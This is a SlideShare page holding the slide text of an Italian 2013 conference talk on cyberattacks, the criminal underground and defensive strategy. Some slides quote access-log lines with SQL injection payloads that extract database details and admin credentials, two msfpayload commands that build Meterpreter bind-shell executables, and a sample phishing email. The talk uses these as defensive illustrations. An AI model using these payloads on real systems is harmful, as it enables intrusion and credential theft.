SlideShare una empresa de Scribd logo

Attacchi, bugie e underground digitale by Andrea Pompili

Codemotion
Codemotion

Possibile che, dopo anni di leaks indiscriminati, conti correnti svuotati e attacchi persistenti di tutte le forme e colori, non sia cambiato nulla? Possibile che, nonostante le OWASP Top 10 citate fino alla nausea e le grida disperate degli espertoni di sicurezza, certe abitudini rimangano così dure a morire? Tra verità e leggende, cercheremo di capire cosa realmente conta per il povero attaccante e cosa, purtroppo, offre il mondo di un’information technology perennemente abbagliata dal mito della scatola magica.

TecnologíaDesarrollo personal
1 de 36
Descargar para leer sin conexión
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com ATTACCHI, BUGIE E UNDERGROUND DIGITALE Speaker: Andrea Pompili There are only 10 types of people in the world: Those who understand binary, and those who don't
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com « » > Bonifica e Hardening fatta a tappeto un anno prima > Sistemi Operativi Patched all’ultima versione disponibile > Logging integrale di tutte le attività del Sito > 2 Sistemi IPS (Intrusion Prevention System) in cascata
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Outside 70% Inside - Accidental 12% Inside - Malicious 9% Inside 5% Unknown 4% Source: http://datalossdb.org/ Statistiche 2012
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 7,20% 6,20% 6,10% 5,70% 6,80% 6,80% 29,90% 41,20% 27,20% 34,10% 34,10% 30,70% 62,90% 52,60% 66,70% 60,20% 59,10% 62,50% Attacchi complessivi rilevati dal 2007 Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 76,00% 3,80% 16,80% 3,40% 76,00% 6,50% 13,70% 3,80% 76,40% 6,70% 13,70% 3,20% Impatto degli Attacchi rilevati Source: OAI (Osservatorio sugli Attacchi Informatici in Italia) “Rapporto OAI 2012”
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com «Non è obiettivo di questo “focus” riportare in dettaglio i risultati della rilevazione ma analizzando i dati relativi ai valori medi per l’intero campione si può ritenere che i risultati siano: • soddisfacenti per la protezione logica; • molto soddisfacenti per la sicurezza dell’infrastruttura; • sufficienti per la sicurezza dei servizi; • da migliorare per la sicurezza dell’organizzazione. «Possiamo dire che ce l’aspettavamo»
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Aki Mon Telecom Shane Atkinson Canter & Siegel Eddie Davidson Peter Francis-Macrae Davis Wolfgang Hawke Jumpstart Technologies Vandar Kushnir Kevin Lipnitz Wayne Mansfield Oleg Nikolaenko Alan Ralsky Dave Rhodes Scott Richter Russian Business Network iFrame Cash SBT Telecom Network Defcon Host Micronnet Ltd. InstallsCash Sendar Argic Richard Colbert Source: Panda Security «The Cyber-crime Black Market: Uncovered> - 2011 RBNet
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping- for-zero-days-an-price-list-for-hackers-secret-software-exploits/
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com (*) According to Frank Rieger Chief technology officer at GSMK
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Source: Vincenzo Iozzo – OWASP Day 2012
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Source: Vincenzo Iozzo – OWASP Day 2012
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie’s exploit, it took a chain of Six Different Bugs in order to successfully break out of the Chrome sandbox. (http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html) Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin. (http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser- sandbox-first-to-fall/10588)
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Blackole Exploit Kit Cool Exploit Kit
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Da: hdesk@rcs.it Inviato: Thursday, November 04, 2004 7:48 PM A: xxxxxx@rcs.it Oggetto: Aggiornamento configurazione Salve, riceve questa mail in quanto sono stati rilevati dei problemi con il suo account di posta elettronica. La causa di tali problemi e' riscontrabile in una non corretta configurazione del Suo computer che La preghiamo di aggiornare collegandosi al seguente indirizzo: http://xxxx.rcs.it/software/av/index.html La preghiamo di eseguire lo script, Configurazione.vbe, di autoconfigurazione il cui link e ' disponibile nella pagina indicata. Al termine della configurazione Le apparira' un messaggio di conferma dell'esito positivo dell'aggiornamento. Distinti Saluti Help Desk - Supporto Tecnico RCS RCS Editori S.p.A. - Settore Quotidiani
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0" 178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]= 1+and(/*!select*/+1+/*!from*/ (/*!select*/+count(*),concat_ws(0x3a, substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64), floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+”
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com 89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]= 11502+and(select+1+from(select+count(*),concat_ws(0x3a, substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin), repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor( rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10" Web Shell Extension
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com http://evader.stonesoft.com/ http://insecure.org/stf/secnet_ids/secnet_ids.html
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com “The truth is, consumer-grade antivirus products can’t protect against targeted malware created by well- resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose”
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com <#1> Ragiona come un Attaccante in modo da comprendere cosa faranno e come ti attaccheranno <#2> Cerca di capire i loro obiettivi, la capacità che hanno, ma soprattutto i vincoli operativi che hanno <#3> Identifica il valore «percepito» di ciò che vuoi difendere, ma soprattutto cosa vuoi difendere <#4> Lavora su tutto il perimetro di difesa, senza atti di fede <#5> Se la tua difesa è più economica dell’attacco, tu sarai sempre in vantaggio
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com
Page  ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/ Andrea Pompili apompili@hotmail.com – Xilogic Corp. ROMA 20-23.03.2013 www.codemotionworld.com Domande? Italian ‫ة‬َّ‫ي‬َ‫أ‬ ‫ِب‬‫ل‬‫ا‬َ‫ط‬َ‫م‬ Arabic ¿Preguntas? Spanish Questions? English tupoQghachmey Klingon Sindarin Japanese Ερωτήσεις? Greek вопросы? Russian

Recomendados

The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
Codemotion
 
The magic world of APT 0.6 - Pompili
The magic world of APT 0.6 - Pompili The magic world of APT 0.6 - Pompili
The magic world of APT 0.6 - Pompili
Codemotion
 
Dove sono i tuoi vertici e di cosa stanno parlando?
Dove sono i tuoi vertici e di cosa stanno parlando?Dove sono i tuoi vertici e di cosa stanno parlando?
Dove sono i tuoi vertici e di cosa stanno parlando?
Codemotion
 
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....
Codemotion
 
Use of customer insight in revire of offender management services in Lewisham
Use of customer insight in revire of offender management services in LewishamUse of customer insight in revire of offender management services in Lewisham
Use of customer insight in revire of offender management services in Lewisham
localinsight
 
Startup in Action - Appandmap pitch
Startup in Action - Appandmap pitchStartup in Action - Appandmap pitch
Startup in Action - Appandmap pitch
Codemotion
 
Demistifying the 3D Web
Demistifying the 3D WebDemistifying the 3D Web
Demistifying the 3D Web
Codemotion
 
Polymer is production ready, how about you?
Polymer is production ready, how about you?Polymer is production ready, how about you?
Polymer is production ready, how about you?
Codemotion
 

Recomendados

The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
The magic world of Advanced Persistent Threat - Andrea Pompili - Codemotion M...
Codemotion
 
The magic world of APT 0.6 - Pompili
The magic world of APT 0.6 - Pompili The magic world of APT 0.6 - Pompili
The magic world of APT 0.6 - Pompili
Codemotion
 
Dove sono i tuoi vertici e di cosa stanno parlando?
Dove sono i tuoi vertici e di cosa stanno parlando?Dove sono i tuoi vertici e di cosa stanno parlando?
Dove sono i tuoi vertici e di cosa stanno parlando?
Codemotion
 
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....
Opportunities for Creative Talents and Startups in Lazio region - Lancia (FI....
Codemotion
 
Use of customer insight in revire of offender management services in Lewisham
Use of customer insight in revire of offender management services in LewishamUse of customer insight in revire of offender management services in Lewisham
Use of customer insight in revire of offender management services in Lewisham
localinsight
 
Startup in Action - Appandmap pitch
Startup in Action - Appandmap pitchStartup in Action - Appandmap pitch
Startup in Action - Appandmap pitch
Codemotion
 
Demistifying the 3D Web
Demistifying the 3D WebDemistifying the 3D Web
Demistifying the 3D Web
Codemotion
 
Polymer is production ready, how about you?
Polymer is production ready, how about you?Polymer is production ready, how about you?
Polymer is production ready, how about you?
Codemotion
 
Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?
Codemotion
 
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
Codemotion
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Codemotion
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)
Codemotion
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware Analysis
Codemotion
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Codemotion
 
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Codemotion
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending story
Codemotion
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3
Codemotion
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Codemotion
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOps
VMware Tanzu
 
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
VMware Tanzu
 
This isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymoreThis isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymore
Lukas Eder
 
Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)
Reshmi Krishna
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
Casey Ellis
 
Better Than BASH: Scripting Kotlin
Better Than BASH: Scripting KotlinBetter Than BASH: Scripting Kotlin
Better Than BASH: Scripting Kotlin
VMware Tanzu
 
PCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and GrafanaPCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and Grafana
VMware Tanzu
 
News bytes Sept-2011
News bytes Sept-2011News bytes Sept-2011
News bytes Sept-2011
Ashwin Patil, GCIH, GCIA, GCFE
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1
scientificcuff635
 
Superhelt 2013-screen
Superhelt 2013-screenSuperhelt 2013-screen
Superhelt 2013-screen
Henrik Kramshøj
 
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Codemotion
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storia
Codemotion
 

Más contenido relacionado

Similar a Attacchi, bugie e underground digitale by Andrea Pompili

Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOps
VMware Tanzu
 
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
VMware Tanzu
 
This isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymoreThis isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymore
Lukas Eder
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
Casey Ellis
 

Similar a Attacchi, bugie e underground digitale by Andrea Pompili (20)

Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?Chi l'ha detto che i virus su Linux non esistono?
Chi l'ha detto che i virus su Linux non esistono?
 
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
The Dark Side of Malware Analysis - Andrea Pompili - Codemotion Rome 2015
 
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
Cyber Wars in the Cyber Space - Andrea Pompili - Codemotion Rome 2017
 
Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)Pompili - The miracle of sprite multiplication (C64)
Pompili - The miracle of sprite multiplication (C64)
 
Andrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware AnalysisAndrea Pompili - The Dark Side of Malware Analysis
Andrea Pompili - The Dark Side of Malware Analysis
 
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
Why I've to waste my time on cryptography? - Andrea Pompili - Codemotion Rome...
 
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
Attacks, Lies and the Underground World - Andrea Pompili - Codemotion Amsterd...
 
Pompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending storyPompili - From hero to_zero: The FatalNoise neverending story
Pompili - From hero to_zero: The FatalNoise neverending story
 
Wearable botnets 201560319_v3
Wearable botnets 201560319_v3Wearable botnets 201560319_v3
Wearable botnets 201560319_v3
 
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
Wearable Botnets and Happy Hacked Drivers - Andrea Pompili - Codemotion Milan...
 
Concourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOpsConcourse in the Real World: A Case Study in CI/CD and DevOps
Concourse in the Real World: A Case Study in CI/CD and DevOps
 
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
Case Study of Batch Processing With Spring Cloud Data Flow Server in Cloud Fo...
 
This isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymoreThis isn't Richard Stallman's Open Source anymore
This isn't Richard Stallman's Open Source anymore
 
Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)Implementing microservices tracing with spring cloud and zipkin (spring one)
Implementing microservices tracing with spring cloud and zipkin (spring one)
 
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIMERELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
RELEASE THE HOUNDS, PART 2: 9 YEARS IS A LONG ASS TIME
 
Better Than BASH: Scripting Kotlin
Better Than BASH: Scripting KotlinBetter Than BASH: Scripting Kotlin
Better Than BASH: Scripting Kotlin
 
PCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and GrafanaPCF Platform Monitoring with Prometheus and Grafana
PCF Platform Monitoring with Prometheus and Grafana
 
News bytes Sept-2011
News bytes Sept-2011News bytes Sept-2011
News bytes Sept-2011
 
Web+proxy Posts - Page 1
Web+proxy Posts - Page 1Web+proxy Posts - Page 1
Web+proxy Posts - Page 1
 
Superhelt 2013-screen
Superhelt 2013-screenSuperhelt 2013-screen
Superhelt 2013-screen
 

Más de Codemotion

Más de Codemotion (20)

Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
Fuzz-testing: A hacker's approach to making your code more secure | Pascal Ze...
 
Pastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storiaPastore - Commodore 65 - La storia
Pastore - Commodore 65 - La storia
 
Pennisi - Essere Richard Altwasser
Pennisi - Essere Richard AltwasserPennisi - Essere Richard Altwasser
Pennisi - Essere Richard Altwasser
 
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
Michel Schudel - Let's build a blockchain... in 40 minutes! - Codemotion Amst...
 
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
Richard Süselbeck - Building your own ride share app - Codemotion Amsterdam 2019
 
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
Eward Driehuis - What we learned from 20.000 attacks - Codemotion Amsterdam 2019
 
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 - Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
Francesco Baldassarri - Deliver Data at Scale - Codemotion Amsterdam 2019 -
 
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
Martin Förtsch, Thomas Endres - Stereoscopic Style Transfer AI - Codemotion A...
 
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
Melanie Rieback, Klaus Kursawe - Blockchain Security: Melting the "Silver Bul...
 
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
Angelo van der Sijpt - How well do you know your network stack? - Codemotion ...
 
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...Lars Wolff - Performance Testing for DevOps in the Cloud - Codemotion Amsterd...
